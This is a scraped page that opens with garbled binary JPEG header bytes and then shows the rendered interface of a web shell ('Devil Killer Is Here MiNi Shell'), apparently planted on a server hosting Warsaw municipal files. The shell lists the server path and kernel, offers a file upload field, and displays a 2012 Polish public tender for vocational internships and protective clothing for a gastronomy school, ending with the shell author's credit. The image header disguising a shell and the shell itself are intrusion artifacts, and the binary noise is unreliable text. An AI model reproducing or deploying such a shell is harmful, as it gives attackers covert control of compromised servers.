JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/521734-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie oraz dostawa odzieży ochronnej dla uczestników uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca</b><br>
<b>Numer ogłoszenia: 521734 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd m. st. Warszawy dla Dzielnicy Praga Południe , ul. Grochowska 274, 03-841 Warszawa, woj. mazowieckie, tel. 22 33 80 717, faks 22 33 80 767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pragapld.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie oraz dostawa odzieży ochronnej dla uczestników uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie oraz dostawa odzieży ochronnej dla uczestników uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca
Zakres zamówienia obejmuje:
Część pierwsza -  wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie
1.	Wykonawca zobowiązuje się do organizacji praktyk zawodowych w roku szkolnym 2012/2013 podzielonych na dwa etapy:
a).	I etap - w okresie od 28 stycznia 2013 (ferie zimowe) do 12 maja 2013 r. - 85 osób - 17 grup 
b).	II etap - w okresie od 14 maja do końca sierpnia 2013 r. - 45 osób-9 grup. 
2.	System organizacji praktyk zawodowych uwzględni zarówno weekendową formę zajęć, jak również zajęcia w ciągu tygodnia. 
3.	Wykonawca zapewni uczestnikom projektu możliwość odbycia praktyk zawodowych w zakładach/lokalach gastronomiczno-hotelarskich w Warszawie, tj.: min. w 3 hotelach (3-5 gwiazdkowych), min. 2 restauracjach dysponujących pełną obsługą kelnerską oraz min. w 1 zakładzie gastronomicznym zapewniającym przygotowanie barmańskie. 
4.	Wykonawca zobowiązuje się do przygotowania szczegółowego harmonogramu praktyk przed podpisaniem umowy i przedstawienie go do akceptacji Zamawiającego. 
5.	Szczegółowe postanowienia i warunki realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 5 do SIWZ.
Część druga - dostawa odzieży ochronnej dla uczestników/uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca.
1.	Zakres dostaw zawarty jest w załączniku nr 1 do wzoru umowy i obejmuje:
Stroje robocze / ochronne dla uczestników/uczestniczek praktyk zawodowych (tj. dla 130 osób): 
- Kucharz - ilość 50 sztuk 
- Kelner - Sommelier-  ilość 40 sztuk
- Barman - Barista - ilość 40 sztuk
Wszystkie stroje robocze (unisex).dla uczniów uczestniczących w praktykach dostosowane będą do indywidualnych rozmiarów uczestników 
Dodatkowo Zamawiający wymaga aby na strojach znalazło się logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z logiem szkoły. Wzór naszywek dostarczy Zamawiający. 
2.	Oferowane wyroby muszą ściśle odpowiadać cechom i parametrom określonym przez Zamawiającego. Wszystkie artykuły muszą być pierwszego gatunku, fabrycznie nowe i wolne od wad.
3.	Szczegółowe postanowienia i warunki realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 5a do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 18.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) dla części pierwszej - wykazania wykonania co najmniej jednej usługi o wartości brutto 45 000,00 zł, polegającej na organizacji praktyk zawodowych z dziedziny gastronomii, wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
b) dla części drugiej - wykazania wykonania co najmniej jednej dostawy o wartości brutto 16 000,00 zł, polegającej na dostawie strojów roboczych/ochronnych z przeznaczeniem dla gastronomii, wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana na podstawie dokumentów i oświadczeń złożonych wraz z ofertą wg zasady: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Oferty - wg wzorów stanowiących załączniki Nr 1 i Nr 1a do SIWZ.
2. Dokument zawierający dane aktualne na dzień składnia ofert (np. odpisu z KRS, wpis do ewidencji działalności gospodarczej) potwierdzający, że oferta została podpisana przez osobę/y właściwie umocowaną, jeśli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do wzoru umowy stanowiącego załącznik Nr 6 do SIWZ w zakresie gdy:
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2) nastąpi zmiana nazwy i siedziby; NIP - u, Regonu Wykonawcy, jeżeli nie powoduje  to zmiany Wykonawcy.
3) z powodu przedłużenia się procedury przetargowej terminy dostawy odzieży bądź rozpoczęcia świadczenia usługi praktyk zawodowych mogą uledz zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zamowienia.pragapld.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Wydziału Zamówień Publicznych 03-833 Warszawa przy ul. Podskarbińskiej 6 w pokoju 217 na II piętrze..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 10:00, miejsce: Siedziba Wydziału Zamówień Publicznych 03-833 Warszawa przy ul. Podskarbińskiej 6 w pokoju 217 na II piętrze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach programu operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie usługi - organizacji praktyk zawodowych w ramach realizacji projektu Współpraca się opłaca współfinansowanego z Programu Operacyjnego Kapitał Ludzki w Zespole Szkół Spożywczo - Gastronomicznych przy ul. Komorskiej 17/23 w Warszawie
1. Wykonawca zobowiązuje się do organizacji praktyk zawodowych w roku szkolnym 2012/2013 podzielonych na dwa etapy:
a) I etap - w okresie od 28 stycznia 2013 (ferie zimowe) do 12 maja 2013 r. - 85 osób - 17 grup 
b) II etap - w okresie od 14 maja do końca sierpnia 2013 r. - 45 osób-9 grup. 
2. System organizacji praktyk zawodowych uwzględni zarówno weekendową formę zajęć, jak również zajęcia w ciągu tygodnia. 
3. Wykonawca zapewni uczestnikom projektu możliwość odbycia praktyk zawodowych w zakładach/lokalach gastronomiczno-hotelarskich w Warszawie, tj.: min. w 3 hotelach (3-5 gwiazdkowych), min. 2 restauracjach dysponujących pełną obsługą kelnerską oraz min. w 1 zakładzie gastronomicznym zapewniającym przygotowanie barmańskie. 
4. Wykonawca zobowiązuje się do przygotowania szczegółowego harmonogramu praktyk przed podpisaniem umowy i przedstawienie go do akceptacji Zamawiającego. 
5. Szczegółowe postanowienia i warunki realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa odzieży ochronnej dla uczestników/uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa odzieży ochronnej dla uczestników/uczestniczek praktyk zawodowych na potrzeby projektu Współpraca się opłaca.
1. Zakres dostaw zawarty jest w załączniku nr 1 do wzoru umowy i obejmuje:
Stroje robocze / ochronne dla uczestników/uczestniczek praktyk zawodowych (tj. dla 130 osób): 
- Kucharz - ilość 50 sztuk 
- Kelner - Sommelier-  ilość 40 sztuk
- Barman - Barista - ilość 40 sztuk
Wszystkie stroje robocze (unisex).dla uczniów uczestniczących w praktykach dostosowane będą do indywidualnych rozmiarów uczestników 
Dodatkowo Zamawiający wymaga aby na strojach znalazło się logo Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej wraz z logiem szkoły. Wzór naszywek dostarczy Zamawiający. 
2. Oferowane wyroby muszą ściśle odpowiadać cechom i parametrom określonym przez Zamawiającego. Wszystkie artykuły muszą być pierwszego gatunku, fabrycznie nowe i wolne od wad.
3. Szczegółowe postanowienia i warunki realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 5a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com